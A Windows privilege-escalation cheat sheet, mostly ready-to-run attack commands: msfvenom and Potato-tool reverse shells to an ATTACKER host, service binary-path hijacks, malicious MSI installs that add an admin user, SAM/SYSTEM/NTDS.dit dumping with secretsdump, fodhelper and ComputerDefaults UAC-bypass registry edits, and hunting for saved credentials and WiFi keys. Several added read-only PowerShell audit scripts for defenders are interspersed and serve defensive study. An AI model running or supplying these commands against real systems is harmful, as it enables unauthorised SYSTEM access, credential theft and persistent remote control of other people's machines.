# Privilege Escalation

Escalate from standard user to local administrator or SYSTEM on Windows systems using misconfigurations and vulnerabilities.
## Enumeration Tools

Always start with automated enumeration to identify potential privilege escalation vectors.
### WinPEAS

The most comprehensive Windows privilege escalation enumeration tool. Colour-coded output highlights severity.
```powershell
# Download WinPEAS
# https://github.com/carlospolop/PEASS-ng/releases
# Run full enumeration
.\winPEASany.exe quiet
# Run specific checks only
.\winPEASany.exe quiet servicesinfo applicationsinfo
.\winPEASany.exe quiet systeminfo userinfo
# Run without color (for logs)
.\winPEASany.exe quiet notcolor
# Colors: Red = 95% PE vector, Yellow = possible PE
# Focus on RED items first
```

### PowerUp
PowerShell-based privilege escalation checker. Can also automatically exploit findings.
```powershell
# Download from PowerSploit
# Bypass execution policy if needed
Set-ExecutionPolicy Bypass -Scope Process
# Import and run all checks
Import-Module .\PowerUp.ps1
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt
# Specific vulnerability checks
Get-ServiceUnquoted             # Unquoted service paths
Get-ModifiableServiceFile       # Writable service binaries
Get-ModifiableService           # Modifiable service configs
Get-UnattendedInstallFile       # Unattend.xml with creds
Get-ModifiableScheduledTaskFile # Writable scheduled tasks
Get-Webconfig                   # Web.config credentials
Get-ApplicationHost             # IIS applicationHost.config
# Automatic exploitation
Invoke-ServiceAbuse -Name 'VulnService' -UserName 'corp\attacker'
Write-ServiceBinary -Name 'VulnService' -Path 'C:\temp\service.exe'
```

### Seatbelt
C# security-oriented host-survey tool. Great for situational awareness.
```powershell
# Run all checks
Seatbelt.exe -group=all
# Specific check groups
Seatbelt.exe -group=user   # User-related checks
Seatbelt.exe -group=system # System-related checks
Seatbelt.exe -group=misc   # Miscellaneous checks
Seatbelt.exe -group=chrome # Chrome data
# Specific checks
Seatbelt.exe TokenPrivileges # Current token privileges
Seatbelt.exe WindowsCredentialFiles
Seatbelt.exe CredentialGuard
Seatbelt.exe InterestingFiles
# Remote execution
Seatbelt.exe -group=remote -computername=TARGET
```
## Service Misconfigurations

Services running as SYSTEM with weak permissions are common privilege escalation vectors.

Service attack types:

- Unquoted Path - spaces in the path without quotes
- Weak Permissions - modify the service configuration
- Writable Binary - replace the service executable
- DLL Hijacking - missing DLLs in writable paths
### Unquoted Service Paths

When a service's binary path contains spaces and is not quoted, Windows tries each space-delimited prefix as an executable, in order, before reaching the intended one.
```powershell
# Find unquoted service paths (cmd.exe syntax; the quadruple quote passes a literal ")
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """"
# PowerShell alternative
Get-WmiObject win32_service | Select-Object Name,PathName,StartMode | Where-Object {$_.PathName -notlike '"*"' -and $_.PathName -like '* *'}
# Example vulnerable path: C:\Program Files\My App\service.exe
# Windows tries in order:
# 1. C:\Program.exe
# 2. C:\Program Files\My.exe ← If you can write here
# 3. C:\Program Files\My App\service.exe
# Check write permissions on path
icacls "C:\Program Files"
icacls "C:\Program Files\My App"
# Exploit: Place malicious executable
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o My.exe
copy My.exe "C:\Program Files\My.exe"
# Restart service (use sc.exe: in PowerShell, sc alone is an alias for Set-Content)
sc.exe stop VulnService
sc.exe start VulnService
```

### Weak Service Permissions
If you can modify a service's configuration, you can change the binary path to your payload.
```powershell
# Check service permissions with accesschk (Sysinternals)
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "BUILTIN\Users" *
# Look for SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS
# Example output showing writable service:
# VulnService SERVICE_ALL_ACCESS
# Check specific service
accesschk.exe /accepteula -ucqv VulnService
sc.exe qc VulnService # View current config
# Modify service binary path
sc.exe config VulnService binpath= "C:\temp\shell.exe"
# Or add yourself as admin and revert
sc.exe config VulnService binpath= "net localgroup administrators attacker /add"
sc.exe stop VulnService
sc.exe start VulnService
# PowerUp automatic exploitation
Invoke-ServiceAbuse -Name 'VulnService' -UserName 'corp\attacker'
```

### Writable Service Binary
```powershell
# Check if service binary is writable
icacls "C:\Program Files\Service\app.exe"
# Replace binary with payload
move "C:\Program Files\Service\app.exe" "C:\Program Files\Service\app.exe.bak"
copy shell.exe "C:\Program Files\Service\app.exe"
sc.exe stop ServiceName
sc.exe start ServiceName
```
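The three service checks above (unquoted paths, weak service DACLs and writable binaries) can be audited in one read-only pass from the defender's side. The script below is an added example written for this page; it is not part of the original cheat sheet or of PowerUp, WinPEAS or accesschk. It assumes PowerShell 5.1 or later on Windows, that `sc.exe` is on the PATH, and that the account running it may read service security descriptors (standard users normally can). The `$BroadSids` list and the `$DangerousServiceMask` bit set are this example's own choices; everything is reported as objects and nothing is changed.

```powershell
# Added audit example (not from the original page): read-only checks for the three
# service weaknesses described above. Assumes PowerShell 5.1+ on Windows with sc.exe on PATH.

# Principals that should never be able to alter a SYSTEM service or its binary
$BroadSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4')  # Everyone, Authenticated Users, Users, INTERACTIVE

# Service-object rights that let a principal change what the service runs:
# SERVICE_CHANGE_CONFIG (0x2), WRITE_DAC, WRITE_OWNER, GENERIC_ALL, GENERIC_WRITE
$DangerousServiceMask = 0x0002 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Test-PathWritable {
    # $true when a broad principal, or the current user or one of its groups, may write to $Path.
    # Bit 0x2 is FILE_WRITE_DATA on a file and FILE_ADD_FILE on a directory.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if (($BroadSids -notcontains $sid) -and ($mySids -notcontains $sid)) { continue }
        $rights = [int]$ace.FileSystemRights
        if (($rights -band 0x2) -or ($rights -band 0x10000000) -or ($rights -band 0x40000000)) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    # Services whose executable path contains a space and is not quoted, with the intermediate
    # names Windows would try first and whether the directory of each is writable.
    Get-CimInstance Win32_Service | Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' } |
      ForEach-Object {
        $exe = $_.PathName -replace '^(.*?\.exe).*$', '$1'   # drop arguments after the .exe
        if ($exe -notmatch '\s') { return }                   # space only in the arguments: not affected
        $parts = $exe -split '\s+'
        $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'   # e.g. C:\Program.exe, C:\Program Files\My.exe
            [pscustomobject]@{ Candidate = $candidate; DirWritable = Test-PathWritable (Split-Path -Parent $candidate) }
        }
        [pscustomobject]@{ Service = $_.Name; RunsAs = $_.StartName; PathName = $_.PathName; Candidates = $candidates }
    }
}

function Get-WeakServiceAce {
    # Parses each service's security descriptor (sc.exe sdshow) and reports Allow ACEs that
    # grant a broad principal any right in $DangerousServiceMask.
    foreach ($svc in Get-CimInstance Win32_Service) {
        $sddl = & sc.exe sdshow $svc.Name 2>$null | Where-Object { $_ -match '^\s*D:' } | Select-Object -First 1
        if (-not $sddl) { continue }
        try { $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl.Trim()) } catch { continue }
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace -isnot [System.Security.AccessControl.CommonAce] -or $ace.AceType -ne 'AccessAllowed') { continue }
            $sid = $ace.SecurityIdentifier.Value
            if (($BroadSids -contains $sid) -and (($ace.AccessMask -band $DangerousServiceMask) -ne 0)) {
                [pscustomobject]@{ Service = $svc.Name; Principal = $sid; AccessMask = ('0x{0:X}' -f $ace.AccessMask) }
            }
        }
    }
}

function Get-WritableServiceBinary {
    # Services whose on-disk executable the current user or a broad principal can overwrite.
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        if ($svc.PathName -match '^\s*"([^"]+)"') { $exe = $Matches[1] }
        else { $exe = $svc.PathName -replace '^(.*?\.exe).*$', '$1' }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)    # some services use %SystemRoot%
        if ((Test-Path -LiteralPath $exe) -and (Test-PathWritable $exe)) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Binary = $exe }
        }
    }
}

# Run all three checks; each returns objects, so the output can be filtered or exported.
Get-UnquotedServicePath | Where-Object { $_.Candidates.DirWritable -contains $true } | Format-List
Get-WeakServiceAce | Format-Table -AutoSize
Get-WritableServiceBinary | Format-Table -AutoSize
```

The SDDL parsing is the part accesschk hides: `sc.exe sdshow` prints the service's descriptor, `RawSecurityDescriptor` turns it into ACEs, and the mask comparison is the same SERVICE_CHANGE_CONFIG / WRITE_DAC / WRITE_OWNER test the page tells you to look for in accesschk output. A service that appears in any of the three result sets should have its path quoted, its DACL tightened, or its binary directory's ACL fixed before an attacker runs the same enumeration.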
## Token Manipulation

Windows tokens contain security information, including privileges. Certain privileges allow escalation to SYSTEM.
| Privilege | Attack | Tool |
|---|---|---|
| SeImpersonatePrivilege | Potato attacks | PrintSpoofer, GodPotato |
| SeAssignPrimaryTokenPrivilege | Token manipulation | Potato attacks |
| SeBackupPrivilege | Read any file | robocopy /b, reg save |
| SeRestorePrivilege | Write any file | DLL hijacking |
| SeTakeOwnershipPrivilege | Take file ownership | takeown, icacls |
| SeDebugPrivilege | Debug processes | Mimikatz LSASS dump |
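To see which accounts on a host actually hold the privileges in the table, a defender can export the local User Rights Assignment and map the SIDs back to names; that is what the next script does. It is an added example for this page, not part of the original sheet or of any tool it lists. It assumes `secedit.exe` (present on supported Windows versions) and an elevated prompt, since the export is denied to standard users; the `$WatchedPrivileges` list is simply the table's six privileges.

```powershell
# Added example (not from the original page): lists which local accounts and groups hold the
# privileges from the table above, by exporting the local security policy with secedit.exe.
# Run from an elevated prompt; the export fails for standard users.

$WatchedPrivileges = @(
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeBackupPrivilege',
    'SeRestorePrivilege', 'SeTakeOwnershipPrivilege', 'SeDebugPrivilege'
)

function Get-PrivilegeAssignment {
    param([string[]]$Privilege = $WatchedPrivileges)
    $inf = Join-Path $env:TEMP ('rights-{0}.inf' -f [guid]::NewGuid())
    try {
        & secedit.exe /export /cfg $inf /areas USER_RIGHTS /quiet | Out-Null
        if (-not (Test-Path -LiteralPath $inf)) { throw 'secedit export failed (not elevated?)' }
        # The [Privilege Rights] section holds lines such as:
        #   SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
        $inSection = $false
        foreach ($line in Get-Content -LiteralPath $inf) {
            if ($line -match '^\[(.+)\]') { $inSection = ($Matches[1] -eq 'Privilege Rights'); continue }
            if (-not $inSection -or $line -notmatch '^\s*(Se\w+)\s*=\s*(.*)$') { continue }
            $name = $Matches[1]
            if ($Privilege -notcontains $name) { continue }
            foreach ($entry in ($Matches[2] -split ',')) {
                $entry = $entry.Trim()
                if (-not $entry) { continue }
                $account = $entry
                if ($entry.StartsWith('*')) {
                    # "*S-1-5-..." is a SID; translate it, but keep the raw SID if it no longer resolves
                    $sid = $entry.Substring(1)
                    try { $account = (New-Object System.Security.Principal.SecurityIdentifier($sid)).Translate([System.Security.Principal.NTAccount]).Value }
                    catch { $account = $sid }
                }
                [pscustomobject]@{ Privilege = $name; Account = $account; Raw = $entry }
            }
        }
    } finally {
        Remove-Item -LiteralPath $inf -ErrorAction SilentlyContinue
    }
}

Get-PrivilegeAssignment | Sort-Object Privilege, Account | Format-Table -AutoSize
```

Anything beyond the built-in defaults (for example a custom application account listed under SeImpersonatePrivilege or SeBackupPrivilege) is a candidate for the attacks in the table and should be reviewed; `whoami /priv` in the next section shows the same information, but only for the current token.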
### Check Current Privileges
```powershell
# List current privileges
whoami /priv
# Check if privilege is enabled vs disabled
# Disabled privileges can often be enabled
# Inspect the current identity and its token handle (PowerShell); this alone does not enable any privilege
$id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$id.Token
# Common accounts with SeImpersonatePrivilege:
# - IIS AppPool accounts (web shells)
# - MSSQL service accounts
# - Service accounts running as NetworkService/LocalService
```

### Potato Attacks (SeImpersonatePrivilege)
Potato attacks abuse Windows token impersonation to escalate to SYSTEM. Different variants work on different Windows versions.
Potato version guide:

- PrintSpoofer - Windows 10 / Server 2016-2019 (best choice)
- GodPotato - works on many versions
- JuicyPotato - Windows 7-10 / Server 2008-2016
- RoguePotato - Windows 10 1809+
- SweetPotato - collection of multiple techniques
```powershell
# PrintSpoofer (Windows 10/Server 2019) - Recommended
# Download: https://github.com/itm4n/PrintSpoofer/releases
PrintSpoofer.exe -i -c cmd                            # Interactive shell
PrintSpoofer.exe -c "nc.exe ATTACKER 4444 -e cmd"     # Reverse shell
# GodPotato (works on many versions)
# Download: https://github.com/BeichenDream/GodPotato/releases
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "nc.exe ATTACKER 4444 -e cmd.exe"
# JuicyPotato (older Windows - needs CLSID)
# Find CLSID: https://ohpe.it/juicy-potato/CLSID/
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
# SweetPotato
SweetPotato.exe -p cmd.exe -a "/c whoami"
SweetPotato.exe -p nc.exe -a "ATTACKER 4444 -e cmd"
```

### SeBackupPrivilege Abuse
With SeBackupPrivilege, you can read any file on the system regardless of ACLs.
```powershell
# Method 1: Registry backup (SAM/SYSTEM hashes)
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY # LSA secrets
# Extract hashes offline
secretsdump.py -sam SAM -system SYSTEM LOCAL
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
# Method 2: Robocopy backup mode (any file)
robocopy /b C:\Windows\NTDS C:\temp ntds.dit
robocopy /b C:\Users\Administrator\Desktop C:\temp
# Method 3: diskshadow (copy locked files like NTDS.dit)
# Create script.txt:
#   set context persistent nowriters
#   add volume c: alias mydrive
#   create
#   expose %mydrive% x:
diskshadow /s script.txt
robocopy /b x:\Windows\NTDS C:\temp ntds.dit
# Then extract from NTDS.dit
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
```

## Scheduled Tasks & Registry
### Scheduled Task Abuse
```powershell
# List scheduled tasks
schtasks /query /fo LIST /v
# Find writable task binaries
accesschk.exe /accepteula -dqv "C:\Task\Folder"
# Check autoruns
autorunsc.exe -a | findstr /n /R "File\ not\ found"
```

### AlwaysInstallElevated
If both registry keys are set to 1, any user can install MSI packages as SYSTEM.
```powershell
# Check if AlwaysInstallElevated is enabled (both must be 1)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# PowerUp check
Get-RegistryAlwaysInstallElevated
# If both return 1, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f msi -o shell.msi
# Or create MSI to add admin user
msfvenom -p windows/adduser USER=attacker PASS=Password123! -f msi -o adduser.msi
# Install MSI (runs as SYSTEM)
msiexec /quiet /qn /i shell.msi
msiexec /quiet /qn /i C:\temp\shell.msi
# PowerUp automatic exploitation
Write-UserAddMSI # Creates UserAdd.msi
```

## UAC Bypass
UAC bypasses allow elevation from medium to high integrity without a UAC prompt. They only work if the user is already a member of the Administrators group.

UAC levels (EnableLUA key):

- 0 - Never notify (UAC disabled)
- 1 - Always notify (most secure)
- 2 - Notify on app changes (default)
- 5 - Default + dim desktop
```powershell
# Check UAC level
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
# Look for: EnableLUA, ConsentPromptBehaviorAdmin
# FodHelper bypass (Windows 10/11)
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -Value "" -Force
Set-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name "(Default)" -Value "cmd /c start powershell.exe" -Force
Start-Process fodhelper.exe -WindowStyle Hidden
# Cleanup
Remove-Item -Path HKCU:\Software\Classes\ms-settings -Recurse -Force
# ComputerDefaults bypass
New-Item -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(Default)" -Value "cmd /c start powershell" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Start-Process "C:\Windows\System32\ComputerDefaults.exe"
# UACME - 70+ bypass methods
# https://github.com/hfiref0x/UACME
akagi64.exe 61 cmd.exe
```
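The AlwaysInstallElevated and UAC sections above both come down to a handful of registry values, and the fodhelper/ComputerDefaults bypass leaves a per-user `ms-settings` handler behind that a defender can look for. The script below audits all of them in one place; it is an added example written for this page, not part of the original sheet, PowerUp or UACME. It assumes PowerShell 5.1 or later; reading is possible as a standard user, while the optional `-Remediate` switch needs an elevated prompt for the HKLM values. The `Risk` labels (`HIGH`, `LOW`, `OK`) are this example's own scale.

```powershell
# Added defensive check (not from the original page): audits the registry settings behind the
# AlwaysInstallElevated and UAC sections above and flags the per-user ms-settings handler the
# fodhelper/ComputerDefaults bypass writes. Read-only unless -Remediate is given.

function Get-RegValue {
    # Returns the value, or $null when the key or value does not exist
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Test-ElevationPolicy {
    param([switch]$Remediate)
    $installer = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $system    = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $hijack    = 'HKCU:\Software\Classes\ms-settings\shell\open\command'

    # 1. AlwaysInstallElevated is only exploitable when BOTH hives are set to 1
    $hkcu = Get-RegValue "HKCU:\$installer" 'AlwaysInstallElevated'
    $hklm = Get-RegValue "HKLM:\$installer" 'AlwaysInstallElevated'
    if ($hkcu -eq 1 -and $hklm -eq 1) { $risk = 'HIGH' }
    elseif ($hkcu -eq 1 -or $hklm -eq 1) { $risk = 'LOW' }
    else { $risk = 'OK' }
    [pscustomobject]@{ Check = 'AlwaysInstallElevated'; Value = "HKCU=$hkcu HKLM=$hklm"; Risk = $risk }
    if ($Remediate -and $risk -ne 'OK') {
        foreach ($hive in 'HKCU', 'HKLM') {
            $key = "${hive}:\$installer"
            if (Test-Path $key) { Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord }
        }
    }

    # 2. UAC policy values: EnableLUA=0 disables UAC, ConsentPromptBehaviorAdmin=0 elevates without prompting
    $lua     = Get-RegValue $system 'EnableLUA'
    $consent = Get-RegValue $system 'ConsentPromptBehaviorAdmin'
    [pscustomobject]@{ Check = 'EnableLUA'; Value = $lua; Risk = $(if ($lua -eq 0) { 'HIGH' } else { 'OK' }) }
    [pscustomobject]@{ Check = 'ConsentPromptBehaviorAdmin'; Value = $consent; Risk = $(if ($consent -eq 0) { 'HIGH' } else { 'OK' }) }

    # 3. Windows registers the ms-settings handler machine-wide; a per-user override under HKCU is
    #    unusual and is exactly what the bypass commands above create.
    if (Test-Path $hijack) {
        [pscustomobject]@{ Check = 'HKCU ms-settings handler'; Value = (Get-RegValue $hijack '(default)'); Risk = 'HIGH' }
        if ($Remediate) { Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force }
    } else {
        [pscustomobject]@{ Check = 'HKCU ms-settings handler'; Value = 'absent'; Risk = 'OK' }
    }
}

Test-ElevationPolicy | Format-Table -AutoSize
```

Because the HKCU handler key is created at bypass time and deleted during cleanup, a one-off audit can miss it; the same check is worth running as a scheduled task or turning into a registry-key-creation detection in your EDR, keyed on `Software\Classes\ms-settings\shell\open\command` under any user hive.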
## Credential Files

Credentials are often stored in plaintext or weakly encrypted in common locations.
```powershell
# Search for password in files
findstr /si password *.txt *.ini *.config *.xml *.ps1 *.bat
findstr /si pwd *.txt *.ini *.config *.xml
findstr /si credential *.txt *.ini *.config *.xml
# Unattend/Sysprep files (often contain admin passwords)
#   C:\Windows\Panther\Unattend.xml
#   C:\Windows\Panther\Unattended.xml
#   C:\Windows\Panther\unattend\Unattend.xml
#   C:\Windows\system32\sysprep\sysprep.xml
#   C:\Windows\system32\sysprep\unattend.xml
# IIS config
#   C:\inetpub\wwwroot\web.config
#   C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
# PowerShell history
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Get-Content (Get-PSReadLineOption).HistorySavePath
# Saved Windows credentials
cmdkey /list
# If admin creds saved, use:
runas /savecred /user:Administrator cmd.exe
# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear
# Group Policy Preferences (cpassword)
findstr /S /I cpassword \\domain.local\sysvol\*.xml
```
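The answer-file paths listed above are worth auditing on your own images, not only hunting on targets. The script below is an added example for this page, not part of the original sheet or of PowerUp's `Get-UnattendedInstallFile`. It checks each known location for a leftover password element and reports whether one is present, whether it is marked `PlainText`, and which principals can read the file, without ever printing the value; the second function finds Group Policy Preference XML files that still carry a `cpassword` attribute under a path you supply (the SYSVOL share from the page, or a local copy). It assumes PowerShell 5.1 or later, and the `$AnswerFilePaths` list is the page's own five locations expressed through `$env:SystemRoot`.

```powershell
# Added defensive audit (not from the original page): finds leftover answer files that still
# carry a password element, and GPP XML files that still carry cpassword. Reports presence only.

$AnswerFilePaths = @(
    "$env:SystemRoot\Panther\Unattend.xml",
    "$env:SystemRoot\Panther\Unattended.xml",
    "$env:SystemRoot\Panther\unattend\Unattend.xml",
    "$env:SystemRoot\system32\sysprep\sysprep.xml",
    "$env:SystemRoot\system32\sysprep\unattend.xml"
)

function Get-AnswerFilePasswordExposure {
    param([string[]]$Path = $AnswerFilePaths)
    foreach ($p in $Path) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $hasPassword = $false; $plain = $false; $parseError = $null
        try {
            [xml]$doc = Get-Content -LiteralPath $p -Raw
            # Password, AdministratorPassword, etc. each wrap a <Value> (and optionally <PlainText>);
            # the unattend namespace varies, so match on local-name() only.
            foreach ($n in $doc.SelectNodes('//*[contains(local-name(),"Password")]')) {
                $value = $n.SelectSingleNode('*[local-name()="Value"]')
                if ($value -and $value.InnerText.Trim()) {
                    $hasPassword = $true
                    $pt = $n.SelectSingleNode('*[local-name()="PlainText"]')
                    if ($pt -and $pt.InnerText.Trim() -eq 'true') { $plain = $true }
                }
            }
        } catch { $parseError = $_.Exception.Message }
        # Who can read it? ReadData (0x1) or GENERIC_ALL (0x10000000) in an Allow ACE
        try {
            $readers = (Get-Acl -LiteralPath $p -ErrorAction Stop).Access |
                Where-Object { $_.AccessControlType -eq 'Allow' -and
                               ((([int]$_.FileSystemRights) -band 0x1) -or (([int]$_.FileSystemRights) -band 0x10000000)) } |
                ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
        } catch { $readers = @('(ACL not readable)') }
        [pscustomobject]@{
            File = $p; HasPassword = $hasPassword; PlainText = $plain
            Readers = ($readers -join ', '); ParseError = $parseError
        }
    }
}

function Find-GppCpassword {
    # XML files under $Root (e.g. a SYSVOL share or a local copy) that still contain cpassword=
    param([Parameter(Mandatory)][string]$Root)
    Get-ChildItem -LiteralPath $Root -Recurse -Filter *.xml -ErrorAction SilentlyContinue |
        Where-Object { Select-String -LiteralPath $_.FullName -Pattern 'cpassword=' -Quiet } |
        Select-Object FullName, LastWriteTime
}

Get-AnswerFilePasswordExposure | Format-Table -AutoSize
# Find-GppCpassword -Root '\\domain.local\sysvol'   # uses the share path from the page
```

A file that reports `HasPassword = True` with any reader beyond Administrators, SYSTEM and TrustedInstaller should be deleted from the image or have its password element stripped; Windows setup normally does this itself, so a surviving copy usually means a custom deployment script left it behind.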
## External Resources

- PEASS-ng (WinPEAS) - GitHub: Privilege Escalation Awesome Scripts Suite
- HackTricks - Windows PrivEsc: comprehensive Windows privilege escalation guide
- PrintSpoofer - GitHub: Potato attack for Windows 10/Server 2019
- UACME - GitHub: 70+ UAC bypass methods
- FuzzySecurity - Windows PrivEsc: classic Windows privilege escalation fundamentals
- Seatbelt - GitHub: security-oriented host-survey tool